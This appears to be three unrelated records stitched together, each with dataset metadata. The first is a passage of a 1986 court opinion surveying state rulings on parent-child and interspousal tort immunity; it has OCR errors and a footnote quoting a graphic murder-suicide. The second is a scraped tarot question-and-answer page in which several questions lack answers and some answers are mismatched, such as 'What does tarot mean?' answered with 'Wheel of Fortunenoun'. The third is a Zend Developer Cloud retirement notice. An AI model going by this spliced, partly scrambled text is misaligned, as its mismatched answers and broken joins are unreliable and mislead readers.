Finding the four basic justifications for parent-child immunity — family harmony, interference with parental discipline/ control, depletion of family resources, and prevention of fraud and collusion — to be "outdated, highly questionale and unpersuasive," the court in Kirchner v. Crystal, 15 Ohio St.3d 326, 474 N.E.2d 275, 276 (1984) abrogated the immunity. "If any disruption to family harmony or tranquility occurs, it is more likely to happen as a result of tortious conduct, rather than as a result of allowing redress of the wrongful actions which led to injury." 474 N.E.2d at 277. Indeed, the court reasoned that domestic tranquility would be restored by the abrogation. The court did recognize the widespread prevalence of liability insurance and its practical effect on suits. Id. Hence, the immunity was abrogated for public policy reasons. Soon thereafter, Ohio also abrogated interspousal immunity. Shearer v. Shearer, 18 Ohio St.3d 94, 480 N.E.2d 388 (1985).
Oregon abrogated parent-child immunity and adopted the position espoused by the Restatement (Second) of Torts. Winn v. Gilroy, 296 Or. 718, 681 P.2d 776 (1984). "We agree with the Restatement (Second) of Torts § 895G, supra, that the pioper inquiry concerns the tortious or privileged nature of a parent's act that causes injury to the child, not a special parental immunity from a child's action for personal torts as distinct from other kinds of claims." 681 P.2d at 784. Such a privilege would not apply to a parent "driving while intoxicated or otherwise contrary to the law." Id., 681 P.2d at 785. Oregon retains, by a "proverbial thread" the doctrine of interspousal immunity. See Moser v. Hampton, 67 Or.App. 716, 679 P.2d 1379, aff'd mem., 298 Or. 171, 690 P.2d 505 (1984) (by an equally divided court).
Pennsylvania opted for total abrogation of parent-child immunity in Falco v. Pados, 444 Pa. 872, 282 A.2d 351 (1971). Previously, the state upheld the immunity to prevent both family discord and fraud or collusion. Now, the court reasoned that it was the injury itself that disrupted family life, not the suit. 282 A.2d at 355. Furthermore, children have always been allowed to sue as to property or contracts. As to the potential for fraud and collusion, it must be left to juries and trial courts to distinguish between frivolous and substantial claims. Id., 282 A.2d at 356. Pennsylvania has also fully abrogated the interspousal immunity.
Finally, South Carolina totally abrogated parent-child immunity in Elam v. Elam, 275 S.C. 132, 268 S.E.2d 109 (1980). The court gave two reasons for this. One, the family harmony argument is no longer valid. This court believed that it was the injury that disrupted family harmony — not the lawsuit. The court also recognized the prevalence of liability insurance. 268 S.E.2d at 111. Two, the court dismissed the possibility of fraud and collusion as a reason to retain the immunity. South Carolina also abrogated, in total, interspousal immunity. In fact, its abrogation was listed as a subsidiary reason for abrogating parent-child immunity.
Immunity Never Adopted
It appears that five states — Hawaii, Nevada, South Dakota, Utah and Vermont — never adopted the judicially created doctrine of parent-child immunity. In Petersen v. City & County of Honolulu, 51 Hawaii 484, 462 P.2d 1007 (1970), it was noted that parent-child negligence suits have always been permitted in Hawaii. "[MJinor children are entitled to the same redress for wrongs done them as are any other persons." 462 P.2d at 1009. Prohibiting recovery will not aid family harmony because any damage to the family relationship occurred at the time of the injury and prohibit ing recovery will not restore harmony. Id. Hawaii has adopted and retained interspousal immunity.
Nevada declined to follow interspousal immunity in Rupert v. Stienne, 90 Nev. 397, 528 P.2d 1013 (1974). In that case, the court indicated that the doctrine of parent-child immunity was never adopted in Nevada, hence, "the right of a child to sue a parent in tort is without restriction or limitation." 528 P.2d at 1018.
South Dakota has apparently never adopted parent-child immunity. See Hollister, Parent-Child Immunity: A Doctrine In Search of Justification, 50 Fordham L.Rev. 489, 494 n. 39 (1982). Kloppenburg v. Kloppenburg, 66 S.D. 167, 280 N.W. 206 (1938) addressed the immunity, but applied Minnesota law. The court did note that the action would not be viable in South Dakota because of the automobile guest statute. 280 N.W. at 206. (The guest statute was repealed in 1978.) Interspousal immunity was abrogated over forty years ago.
Utah also never adopted the parent-child immunity. See Elkington v. Foust, 618 P.2d 37, 40 (Utah 1980) ("there is no foundation in our law, statutory or decisional, upon which to base parental immunity"); see also Bishop v. Nielsen, 632 P.2d 864 (Utah 1981) (court declined to address issue of parent-child immunity in a contribution case).
Finally, in Wood v. Wood, 135 Vt. 119, 370 A.2d 191 (1977), Vermont declined to adopt the parental immunity rule. "Since this state has historically allowed other kinds of suits between parent and child, . and has recently set aside interspousal immunity ., a contrary ruling would be anomalous." 370 A.2d at 193 (citations omitted). The policies of family harmony, collusion and fraud were deemed insufficient to preclude negligence suits between parent and child.
Partial Abrogation of the Immunity
Twenty-six states and the District of Columbia have abrogated the parent-child immunity in part. The vast majority of those states abrogating the doctrine in part permit a suit premised upon an automobile tort. Indeed, many of the partial abrogations arose precisely in such a factual scenario. For example, Alaska abrogated the doctrine as to motor torts in Hebel v. Hebel, 435 P.2d 8 (Alaska 1967). The existence of liability insurance was of "considerable significance" in that insurance negated "adherence to family-harmony and parental-discipline-and-control arguments.... " Id. at 15. Alaska has fully abrogated the doctrine of interspousal immunity.
Arizona has also abrogated the immunity as to motor torts and has left the door open to further limitation of the immunity.
We do not, by this case, limit the abrogation of the parental immunity doctrine to automobile negligence cases. We will continue to consider, on a case by case basis, the actual cause of the injury and whether the act of the parent breached a duty owed to the world at large, as opposed to a duty owed to a child within the family sphere. Sandoval v. Sandoval, 128 Ariz. 11, 623 P.2d 800, 803 (1981).
In Connecticut the immunity has been abrogated in part by statute. See Conn.Gen.Stat. § 52-572c (1985) ("In all actions for negligence in the operation of a motor vehicle, and in all actions accruing on or after October 1, 1979, for negligence in the operation of an aircraft or vessel, . resulting in personal injury, wrongful death or injury to property, the immunity between parent and child in such negligence action brought by a parent against his child or by or on behalf of a child against his parent is abrogated.") Connecticut has abrogated, in full, the interspousal immunity.
Delaware has similarly abrogated the immunity as to motor torts, but refused to extend its abrogation to a negligent supervision case. Schneider v. Coe, 405 A.2d 682 (Del.1979).
Unlike driving an automobile, supervision of one's children involves issues of parental control, authority, and discretion that are uniquely matters of a very personal type of judgment. The freedom to exercise such judgment has constitutional underpinning and contrasts sharply with the state's supervision and regulation of the judgment one must exercise while driving an automobile.
405 A.2d at 684. Essentially, "[pjarental immunity will not be abrogated where the duty arises from the family relationship, for to do so would manifestly tend to disturb domestic tranquility." Id. Delaware has retained the inter-spousal immunity.
In Florida, the courts have abrogated the parent-child immunity in motor torts "to the extent of the parent's available liability insurance coverage." Ard v. Ard, 414 So.2d 1066, 1067 (Fla.1982). This exception is limited to the value of the insurance. "If the parent is without liability insurance, or if the policy contains an exclusion clause for household or family members, then parental immunity is not waived and child cannot sue the parent." Id. The existence of insurance does not create liability; but instead impacts upon the public policy relied upon to uphold the immunity. More specifically, "[w]hen recovery is allowed from an insurance policy the claimant will not force a depletion of the family assets at the expense of other family members." Id. at 1068-1069. Florida still retains the inter-spousal immunity, but it has been questioned by the lower appellate courts.
Iowa has also abrogated the parent-child immunity, again, at least with respect to motor torts. Turner v. Turner, 304 N.W.2d 786 (Iowa 1981). "[W]e hold that, at least outside the area of parental authority and discretion, unemancipated minor children are not barred by the immunity doctrine from suing their parents for negligence torts." 304 N.W.2d at 789. Later, the Supreme Court of Iowa refused to extend its abrogation to suit grounded in negligent supervision. Wagner By Griffith v. Smith, 340 N.W.2d 255 (Iowa 1983). In that case, parental immunity was maintained in two specific instances; that is (1) when the act at issue involves "parental authority over the child; or (2) parental discretion in respect to the provision of food, clothing, shelter, education, medical and dental services, and other care." 340 N.W.2d at 256 (citing Goller v. White, 20 Wis.2d 402, 122 N.W.2d 193 (1963) (seminal case as to abrogation)). Interspousal immunity has been abrogated as to all personal injury actions in Iowa.
The Supreme Court of Kansas refused to adopt parent-child immunity in a case involving a motor tort. Nocktonick v. Nocktonick, 227 Kan. 758, 611 P.2d 135 (1981). The court opined: "We see no good reason why children should not enjoy the same right to protection and to legal redress for wrongs done them as others enjoy. We question the view that a regard for family harmony and tranquility necessitates denial of tort recovery to a child injured in an automobile accident." 611 P.2d at 140. The court limited its holding to motor torts, indicating other factual scenarios would be addressed as they develop. Id., 611 P.2d at 142. The result of Nocktonick was short-lived as noted in Guffy By And Through Reeves v. Guffy, 230 Kan. 89, 631 P.2d 646 (1981). In discussing the Nocktonick decision it was noted that "[t]he legislature has now amended the Kansas Automobile Injury Reparations Act by enacting Senate Bill No. 371. Effective January 1, 1982, an insurer is given and will no doubt exercise its right in liability insurance policies to exclude coverage of 'any bodily injury to any insured or any family member of an insured residing in the insured's household.' " 631 P.2d at 650-51. See Kan.Stat.Ann. § 40-3107(i)(l) (1981), but see Kan.Stat.Ann. § 40-3107 (1981, Cum.Supp.1985) which no longer contains that exclusion. Interspousal immunity is still retained in Kansas.
In permitting a suit by a minor against, his mother, the driver of the car involved in an accident, Kentucky formulated a new rule as to parent-child immunity. Rigdon v. Rigdon, 465 S.W.2d 921 (Ky.1971). The immunity was abrogated with two exceptions: "(1) where the negligent act relied on for a recovery involves the reasonable exercise of parental authority over the child, and (2) where the alleged negligent act involves the exercise of ordinary parental discretion with respect to provisions for the care and necessities of the child." 465 S.W.2d at 923. Kentucky has abrogated, in full, interspousal immunity.
In Black v. Solmitz, 409 A.2d 634 (Me.1979), the Supreme Judicial Court of Maine held that the rule upholding parent-child immunity in full was "counterproductive in achieving the purpose of promoting family harmony or parental autonomy in the governance of minor children." 409 A.2d at 639. Although a motor tort was at issue in Black, the court refused to limit its abrogation to either auto torts or the extent of the parents' insurance. The court did state that to "the extent the so-called 'doctrine of parental immunity' reflects the idea that the parent-child relationship is a special one, in which parents should have a reasonably high degree of autonomy in carrying out their responsibilities for care and discipline of their children, we think the doctrine should have continuing vitality." Id. Maine has fully abrogated interspousal immunity.
The Massachusetts decision of Sorensen v. Sorensen, 369 Mass. 350, 339 N.E.2d 907 (1975) is often cited by jurisdictions opting to abrogate parent-child immunity as to motor torts. In that suit a minor child sued his mother for personal injuries received in an automobile accident. After reviewing the historical backdrop of parent-child immunity, the court noted "a marked trend toward abrogation or limitation of the doctrine of parental immunity . in other jurisdictions." 339 N.E.2d at 911. This trend was said to be indicative of growing "judicial distaste" of the immunity. Id., 339 N.E.2d at 912 (citation omitted). Noting its approval of those jurisdictions favoring abrogation, the Supreme Judicial Court of Massachusetts opined that "[cjhildren enjoy the same right to protection and to legal redress for wrongs done them as others enjoy. Only the strongest reasons, grounded in public policy, can justify limitation or abolition of those rights." Id., 339 N.E.2d at 912. In rejecting the policy rationale that a lawsuit would disrupt family harmony and tranquility, the court reasoned that "[t]he primary disruption to harmonious filial relations is not the lawsuit brought for damages after the injury but the injury itself, resulting from the misconduct of a parent." Id., 339 N.E.2d at 913. Denying the injured child access to the courts will not then aid family reconciliation. Id. The court also noted that children have always been permitted to sue their parents in contract or over disputed property. Id., 339 N.E.2d at 914. Moreover, tort actions often involve insurance, hence, the action between the parent and child would not be truly adversary. Id.
The court did note the possibility of collusion, but was confident that insurance company investigations as well as criminal statutes rendering such attempts punishable offenses would curb such attempts. Id., 339 N.E.2d at 915.
The Sorenson court limited the abrogation to the auto tort context noting "that there may be parental exercises of discretion and authority which should be immune from scrutiny in a court of law." Id., 339 N.E.2d at 916. Massachusetts has also abrogated interspousal immunity as to motor torts.
Michigan abrogated parent-child immunity as to motor torts in Sweeney v. Sweeney, 402 Mich. 234, 262 N.W.2d 625 (1978). Parents generally are not responsible for negligent supervision because there are two exceptions to the state's abrogation, including the exercise of reasonable parental authority and/or reasonable parental discretion as to the necessities of life (e.g., food, clothing, housing and medical care). Wright v. Wright, 134 Mich.App. 800, 351 N.W.2d 868, 870 (1984) (citation omitted). Interspousal immunity has been totally abrogated in Michigan.
In a certified question from a federal district court, the Supreme Court of Montana also permitted an unemancipated minor to sue a parent for injuries arising from an automobile accident. Transamerica Ins. Co. v. Royle, 202 Mont. 173, 656 P.2d 820 (1983). This was a case of first impression in the state. In deciding to permit the suit, the court reasoned that "[t]o allow such an action does not undermine parental authority and discipline, nor does it threaten to substitute judicial discretion for parental discretion in the care and rearing of minor children. We must recognize that there may be parental exercises of discretion and authority which would deserve special protection in a court of law." 656 P.2d at 824. Accordingly, the court limited its decision to the factual scenario of an auto tort. It further held that household exclusions were invalid. The interspousal immunity rule remains valid in Montana.
New Hampshire has also permitted unemancipated minors to sue their parents for personal injuries arising out of automobile accidents. Briere v. Briere, 107 N.H. 432, 224 A.2d 588 (1966). Although there is some risk of collusion the court was confident that any such "chicanery" could be handled by the judicial system. 224 A.2d at 590. As to the popular rationale that such a suit would deplete family resources, the court noted "that if the father has means, he will almost inevitably carry insurance, and if he has not, the chances of anyone bringing suit for the child are remote." Id. Hence, the existence of insurance was a factor to consider as to both family resource and harmony. The court reasoned that a suit for personal injuries in which an insurance policy existed would be far less disruptive than a contract or property action "where the parent would ordinarily have to pay a verdict from his own pocket." Id., 224 A.2d at 591. Interspousal immunity is fully abrogated in New Hampshire.
North Carolina has effected a partial abrogation of the parent-child immunity through a statute, which provides: "The relationship of parent and child shall not bar the right of action by a person or his estate against his parent for wrongful death, personal injury, or property damage arising out of operation of a motor vehicle owned or operated by the parent." N.C.Gen.Stat. § 1-539.21 (1983 Repl.Vol., 1985 Cum.Supp.). Interspousal immunity has been fully abrogated in North Carolina.
Oklahoma, viewing the existence of mandatory liability insurance as "significant," also abrogated parental immunity as to motor torts. Unah By And Through Unah v. Martin, 676 P.2d 1366 (Okla.1984). "Today, where all other passengers in a car are mandatorily protected by liability coverage it is unfair and against public interest to deprive an unemancipated minor the benefit of recovery." 676 P.2d at 1370. The court further observed "that familial harmony is more likely to be disturbed where the family's fund is depleted because the proceeds from the liability insurance cannot be reached." Id. Finally, the possibility of fraud or collusion is not a sufficient reason to justify a blanket denial. Id. at 1369. See also Hooper By And Through Hooper v. Clements Food, 694 P.2d 943 (Okla.1985) (unemancipated minor may fully recover damages from parent's employer when injured as a result of parent's negligence within course and scope of employment); but cf. Sixkiller v. Summers, 680 P.2d 360, 362 (Okla.1984) (court declined to abrogate immunity in a case involving parental discretion/supervision because such litigation "would adversely affect the family relationship by intruding upon the authority and discretion of parents in rearing and caring for their children."). The interspousal immunity rule has been fully abrogated in Oklahoma.
Rhode Island abrogated the parent-child immunity as to motor torts, but noted that "there may be parental exercises oí discretion and authority which should be immune from judicial scrutiny." Silva v. Silva, 446 A.2d 1013, 1016 (R.I.1982). There is no question of parental control in an auto tort however, and the existence of liability insurance tempers the possibility of family discord and the availability of insurance monies may avoid the depletion of family resources. Id. at 1015. Interspousal immunity is also abrogated as to motor torts.
Virginia recognizes several exceptions to the parent-child immunity rule, including motor torts. Wright v. Wright, 213 Va. 177, 191 S.E.2d 223 (1972) (citing Smith v. Kaufman, 212 Va. 181, 183 S.E.2d 190 (1971)). Other exceptions include: (1) an emancipated child; (2) a child engaged in a master-servant relationship with a parent; (3) an injury-received by a child when the parent was acting within scope of employment; and (4) when the parent-child relationship is purely incidental — such as when the parent is a common carrier and the child is one of several passengers. Failure to "discharge the normal parental duty for supervising and providing a safe place for the child to play" is covered by the immunity. Wright, 191 S.E.2d at 225. In Virginia interspousal immunity is abrogated as to motor torts.
Opting to follow the "modern trend," Washington has also abrogated parent-child immunity, at least as to motor torts. Merrick v. Sutterlin, 93 Wash.2d 411, 610 P.2d 891 (1980). As to all other factual scenarios, the court adopted a case-by-case approach "to develop the details of any portions of the immunity____" 610 P.2d at 893. Inter-spousal immunity has been fully abrogated in Washington.
West Virginia abrogated parent-child immunity in the context of motor torts. "In the realm of automobile cases we cannot brush aside or ignore the almost universal existence of liability insurance," thereby negating the family tranquility argument. Lee v. Comer, 159 W.Va. 585, 224 S.E.2d 721, 723 (1976). Moreover, minors should "enjoy the same right to legal redress for wrongs done to them as others enjoy." Id., 224 S.E.2d at 723 (citation omitted). West Virginia has abrogated, in full, interspousal immunity.
Wyoming has essentially abrogated parent-child immunity as to motor torts by holding household exclusions invalid. "The effect of this holding is to find that Wyoming's compulsory insurance statute overrules the former holdings of this court which recognize intra-family and interspousal immunity to and including the minimum requirements contained in the financial responsibility law and the uninsured motor vehicles act." Allstate Ins. Co. v. Wyoming Ins. Dept., 672 P.2d 810, 814 (Wyo.1983). See also Meyer v. State Farm Mut. Auto. Ins. Co., 689 P.2d 585 (Colo.1984) (en banc) wherein it was held that household exclusions in automobile insurance policies were invalid. Meyer did not involve a child versus parent action, but it did cite Trevarton v. Trevarton, 151 Colo. 418, 378 P.2d 640 (1963) as eliminating intra-family tort immunity. At issue in Trevarton, however, was only the right of a minor to sue a parent for negligence related to the discharge of a business duty— as opposed to a parental duty. Hence, the status of the immunity in Colorado is unclear. Interspousal immunity has been totally abrogated there.
In sum, at least 20 jurisdictions have abrogated parent-child immunity, in part, specifically as to motor torts. Furthermore, other jurisdictions have abrogated the immunity in part by designating those areas in which the immunity still exists. Arguably, these designated exceptions to the immunity would not encompass an action in negligence arising from an automobile accident. The seminal case in this area is the Wisconsin decision of Goller v. White, 20 Wis.2d 402, 122 N.W.2d 193 (1963). In that case, the minor child was injured by a bolt protruding from his parents' tractor. After reviewing various arguments, the Supreme Court of Wisconsin decided that parent-child immunity
ought to be abrogated except in these two situations: (1) where the alleged negligent act involves an exercise of parental authority over the child; and (2) where the alleged negligent act involves an exercise of ordinary parental discretion with respect to the provision of food, clothing, housing, medical and dental services, and other care.
122 N.W.2d at 198. "Accordingly the rule is abolished in personal injury actions subject to these noted exceptions." Id. The court acknowledged that the "wide prevalence" of liability insurance was considered in rendering its policy decision as to partial abrogation. Wisconsin fully abrogated the interspousal tort immunity over fifty years ago.
At least three other states have adopted the Wisconsin approach — Kentucky, New Jersey and Michigan. It should be noted that Minnesota once followed the two-part exception, but later rejected it in favor of the "reasonable parent" standard. Kentucky adopted the partial abrogation in Rigdon v. Rigdon, 465 S.W.2d 921 (Ky.1971) (discussed supra). The two exceptions, that is, the two activities that remain immune, are the reasonable exercises of parental authority and the exercise of ordinary parental discretion with respect to the necessaries of life. A similar rule is in place in Michigan as delineated in Wright v. Wright, 134 Mich.App. 800, 351 N.W.2d 868, 870 (1984). In Wright a father was immune from negligence suit instituted by his daughter regarding a self-inflicted accidental gunshot wound suffered by the daughter. The litigation sounded in "negligent supervision," therefore, the father was immune under the two-part exception as to parental authority and discretion as to necessaries.
Both the Michigan and Kentucky cases reference automobile torts. Suits relating to personal injuries arising from a motor tort are actionable, i.e., outside the purview of the immunity. Although the New Jersey case of Foldi v. Jeffries, 93 N.J. 533, 461 A.2d 1145 (1983) did not arise within the factual setting of a motor tort, the language employed by the court seems to indicate that such a suit would not be immune. Specifically, New Jersey has maintained the parent-child immunity "in the areas involving the exercise of parental authority or the provision of customary child care." 461 A.2d at 1152. Although the wording is somewhat modified or simplified, the import of this two-part exception is essentially the same as Goiter, the seminal case out of Wisconsin. It is left to the lower courts to determine if the facts of a particular case fit within the exceptions. As to "negligent supervision," the doctrinal exceptions will protect the parent in a case of simple negligence, but it will not immunize "a parent who has willfully or wantonly failed to watch over his or her child." Id. As have so many other states, New Jersey has fully abrogated interspousal immunity.
The District of Columbia, in a case of first impression, adopted parent-child immunity but subjected the immunity to a number of exceptions. Dennis v. Walker, 284 F.Supp. 413 (D.D.C.1968). In Dennis, the federal district court held that a defendant sued by a minor for personal injuries cannot maintain an action for contribution against the minor-plaintiff's parents on the ground that they were joint tortfeasors. The District of Columbia, as previously indicated, delineated exceptions to the immunity. The immunity is inapplicable if: (1) the conduct at issue is deemed to be willful or wanton, (2) the injury arose while the parents were acting within the scope of their employment; or (3) the suit is instituted against the estate of either a deceased parent or child. The District of Columbia retains inter-spousal immunity.
The State of Idaho has indicated its unwillingness to adopt a "categorical rule that universally prohibits parent-child actions on the basis of a total and absolute parental immunity." Pedigo v. Rowley, 101 Idaho 201, 610 P.2d 560, 564 (1980). In Pedigo a minor child alfoat on a raft in a lake, was struck and injured by a speed boat. The owners and operator of the speed boat instituted a third party action against the minor's father for negligent supervision. In disallowing that particular claim the court stated: "We believe that the integrity of the family plays an essential role in the welfare of our society. To that extent, we agree with those jurisdictions which still retain the doctrine of parental immunity." 610 P.2d at 564. But, the court was unwilling to state that no exceptions would be recognized; however, no indication was given as to when the immunity would be relaxed.
Illinois has also recognized exceptions to the parent-child immunity. Previously, Illinois courts maintained the immu nity as a "matter of public policy due to the interests of the State in maintaining harmony within the family." Mroczynski v. v. McGrath, 34 Ill.2d 451, 216 N.E.2d 137, 139 (1966). Illinois modified the parent-child immunity because the "public policy considerations favoring the promotion of family harmony and the prevention of intrafamily litigation and strife . will not be served." Larson v. Buschkamp, 105 Ill.App.3d 965, 61 Ill.Dec. 732, 735, 435 N.E.2d 221, 224 (1982). For example, there is no immunity as to: (1) willful and wanton misconduct; (2) when the family relationship is dissolved by death; (3) a breach of duty to the public at large — as opposed to a duty related to a familial relationship; (4) duty to keep trees and bushes trimmed to permit a clear view of the street and/or sidewalk; and (5) an action for contribution against a parent is permissible. As to the fifth exception, the court noted that "[t]he widespread use of liability insurance mitigates against the possibility that such suits disrupt the domestic peace or deplete the family's financial resources." 61 Ill.Dec. at 736, 435 N.E.2d at 225. This language suggests direct suits as to personal injuries from motor torts would be permissible. Interspousal immunity is statutorily retained in Illinois as to all torts except an intentional tort. Ill.Rev.Stat.Ann. Ch. 40, § 1001 (1980, Cum.Supp.1985).
Finally, the state of Texas has also abrogated parent-child immunity in part. In Felderhoff v. Felderhoff 473 S.W.2d 928 (Tex.1971) the court held that the general rule of parental immunity is not applicable "[o]nce a child has become an employee in the business vocation of his parent or his parent's business partnership____" Id. at 930. When acting in a business setting, parents are not discharging "normal parental duties and responsibilities." Id. at 933. In recognition of the public policies of peace, tranquility and discipline in the home, the immunity was retained "with respect to alleged acts of ordinary negligence which involve a reasonable exercise of parental authority or the exercise of ordinary parental discretion with respect to provisions for the care and necessities of the child." 473 S.W.2d at 933. This language would seemingly permit a suit for personal injuries arising from a motor tort. Texas has retained, however, interspousal immunity to all but intentional torts.
. Hereinafter, unless otherwise indicated, reference to "Barbara" includes Barbara J. Frye individually and as guardian and next friend of George L. Frye, III.
. In the presence of their infant daughter, the husband shot his wife "with a shotgun, thereby blowing away the right side of her head, a portion of her skull coming to rest on the kitchen table, and her body collapsing backward over a chair with her head resting in one pool of blood and her feet resting in another." Mahnke v. Moore, 197 Md. 61, 63, 77 A.2d 923 (1951). The father kept the child with the dead body for six days, then drove her to his home. The next day "he committed suicide in her presence by shooting himself with a shotgun, thereby causing masses of his blood to lodge upon her face and clothing." Id.
. The court observed: "The state, through its criminal laws, will give the minor child protection from parental violence and wrongdoing, and this is all the child can be heard to demand." Hewlett v. George, 68 Miss. 703, 9 So. 885, 887 (1891).
. The majority in Boblitz v. Boblitz, 296 Md. 242, 462 A.2d 506 (1983), observed:
Application of the words ZKferspousal immunity to this ancient rule of law [of unity of identity of husband and wife] borders on mockery. It would be more aptly called 'a rule in derogation of married women.' Under it the person and property of a woman upon marriage come under the 'protection and influence' of her husband — for good or ill. She became subservient to his will and fitted with a distasteful yoke of servitude and compelled obeisance that was galling at best and crushing at worst. Id. at 245, 462 A.2d 506 (emphasis in original).
. See, for instance, the comments of then Chief Judge Marbury in Gregg v. Gregg, 199 Md. 662, 667-668, 87 A.2d 581 (1952) and those of Judge Hammond, later Chief Judge, in Fernandez v. Fernandez, 214 Md. 519, 521, 135 A.2d 886 (1957).
. These numbers have changed somewhat in the intervening years. Ohio and Tennessee have since abrogated interspousal immunity, see Shearer v. Shearer, 18 Ohio St.3d 94, 480 N.E.2d 388 (1985); Davis v. Davis, 657 S.W.2d 753 (Tenn.1983). Wyoming has abrogated inter-spousal immunity, at least as to motor torts. See Allstate Ins. Co. v. Wyoming Ins. Dept., 672 P.2d 810 (Wyo.1983).
. Restatement (Second) of Torts § 895G(1) (1977) abandons the use of parent-child immunity:
A parent or child is not immune from tort liability to the other solely by reason of that relationship.
Subsection 2, however, cautions:
Repudiation of general tort immunity does not establish liability for an act or omission that, because of the parent-child relationship, is otherwise privileged or is not tortious.
See Comment k to subsection 2.
The legal scholars and commentators generally take a dim view of parent-child immunity. Fifty years ago, a commentator suggested changes in or abrogation of the doctrine. McCurdy, Torts Between Persons In Domestic Relation, 43 Harv.L.Rev. 1030, 1077-1081 (1930). See also F. Harper & F. James, The Law of Torts § 8.11 (1956); W. Prosser & W.P. Keeton, The Law of Torts § 122 (W.P. Keeton general editor, 5th ed. 1984); McCurdy, Torts Between Parent and Child, 5 Vill.L.Rev. 521 (1960); Hollister, Parent-Child Immunity: A Doctrine in Search of Justification, 50 Fordham L.Rev. 489 (1982); Comment, Parent-Child Tort Immunity: Time for Maryland to Abrogate an Anachronism, 11 U.Balt.L.Rev. 435 (1982).
. The cases are listed in alphabetical order by states for ease of reference to the Appendix to this opinion.
. Cf. Attwood v. Estate of Attwood, 276 Ark. 230, 633 S.W.2d 366 (1982) (child injured in an automobile accident caused by his father's voluntary intoxication and excessive speeding allowed to sue because father's actions were viewed as willful and wanton under the circumstances).
. Cf. Buffalo v. Buffalo, 441 N.E.2d 711 (Ind.App.1982) (parent-child immunity does not apply to a noncustodial parent as the reasons for maintaining the immunity — protection of domestic peace and tranquility — are not applicable).
. See also Felderhoff v. Felderhoff, 473 S.W.2d 928 (Tex.1971) (discussed infra pp. 580-583)..
| common_corpus | {'identifier': '2059797_2', 'collection': 'Caselaw Access Project', 'open_type': 'Open Government', 'license': 'Public Domain', 'date': '1986.0', 'title': 'None', 'creator': 'None', 'language': 'English', 'language_type': 'Spoken', 'word_count': '6921', 'token_count': '10205', '__index_level_0__': '52069', 'original_id': '9622eb72ca3f6f701d8f9067d0269cf91151ca8f5e8d3ec55331bb0a8447d927'} |
Question: What Is The Meaning Of The Magician Card In Tarot?
What element is the high priestess?
WaterThe High Priestess/Element.
What does the tarot card the moon mean?
The Moon is a card of illusion and deception, and therefore often suggests a time when something is not as it appears to be. Perhaps a misunderstanding on your part, or a truth you cannot admit to yourself.The Moon/Meaning
What element is the emperor in Tarot?
FireThe Emperor/Element
What is the second tarot card?
What does the Wheel of Fortune card mean?
A common aspect to most interpretations of this card within a reading is to introduce an element of change in the querent’s life, such change being in station, position or fortune: such as the rich becoming poor, or the poor becoming rich.Wheel of Fortune/Meaning
What does the Highest Priestess tarot card mean?
What is the meaning of Arcana?
The word arcanum (pluralized as “arcana”) came from Latin arcanus, meaning “secret,” and entered English as the Dark Ages gave way to the Renaissance. It was often used in reference to the mysteries of the physical and spiritual worlds, subjects of heavy scrutiny and rethinking at the time.
What is the magician mean?
1 : one skilled in magic especially : sorcerer. 2 : one who performs tricks of illusion and sleight of hand. Synonyms Example Sentences Learn More about magician.
What does the tarot card temperance mean?
This card indicates that you should learn to bring about balance, patience and moderation in your life. You should take the middle road, avoiding extremes and maintain a sense of calm.Temperance/Meaning
What element is the Empress?
EarthThe Empress/Element
Where did playing cards come from?
What sign does the magician represent in Tarot?
The illustration of the Tarot card “The Magician” from the Rider-Waite tarot deck was developed by A. E. Waite for the Hermetic Order of the Golden Dawn in 1910. Waite’s magician features the infinity symbol over his head, and an ouroboros belt, both symbolizing eternity.
What does the Sun card mean in tarot?
The card portends good fortune, happiness, joy and harmony. It represents the universe coming together and agreeing with your path and aiding forward movement into something greater.The Sun/Meaning
How many tarot cards are there?
78 cardsThe standard modern tarot deck is based on the Venetian or the Piedmontese tarot. It consists of 78 cards divided into two groups: the major arcana, which has 22 cards, also known as trumps, and the minor arcana, which has 56 cards.
What element is the death in Tarot?
What does tarot mean?
Wheel of Fortunenoun. one of a special pack of cards, now used mainly for fortune-telling, consisting of 78 cards (4 suits of 14 cards each (the minor arcana), and 22 other cards (the major arcana)) a card in a tarot pack with distinctive symbolic design, such as the Wheel of Fortune. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '177', 'language_id_whole_page_fasttext': "{'en': 0.9479637742042542}", 'metadata': "{'Content-Length': '37636', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:C3MJF67CTIRSRL6PR2YIREZXJSIQQYJI', 'WARC-Concurrent-To': '<urn:uuid:a1df08d5-0e2c-498e-9bae-5c20c4422b21>', 'WARC-Date': datetime.datetime(2021, 1, 23, 5, 36, 30), 'WARC-IP-Address': '87.236.16.235', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:GUQ4CGU36MCRHMNKANV5AKSTVRGU62M5', 'WARC-Record-ID': '<urn:uuid:836111a9-b3c7-4f7a-b6d2-efc1a16be603>', 'WARC-Target-URI': 'https://callirichards.com/qa/question-what-is-the-meaning-of-the-magician-card-in-tarot.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:601acdff-4ec4-4acf-9579-9bdbd6e10272>', 'WARC-Truncated': None}", 'previous_word_count': '581', 'url': 'https://callirichards.com/qa/question-what-is-the-meaning-of-the-magician-card-in-tarot.html', 'warcinfo': 'isPartOf: CC-MAIN-2021-04\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-52.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.9393740296363831', 'original_id': 'ea7eb9db487e441d617a6182c18923c919aa2790fe216b367d66bf2e84e453e7'} |
Having served the PHP community faithfully, the Zend Developer Cloud has reached ITS retirement and is about to be discontinued.
As an alternative, we suggest you move your development environment to AWS by trying the Zend Server 7 Developer Edition Amazon Machine Image.
Zend Server on Amazon is the enterprise way to run PHP in the cloud. An application server with a supported PHP runtime, Zend Server gives PHP developers and DevOps engineers development tools such as Z-Ray, app deployment automation, performance monitoring, request analysis, and configuration management - so apps run faster, scale better, and stay up longer.
For detailed instructions on how to migrate your applications, click here. If you still have questions, contact us at: documentation@zend.com or @ZendDocs | mini_pile | {'original_id': '3b5671ebd3dfdfb2b7bcc6abfc0095817eff56fab123376f4eefe255f81220e9'} |
---
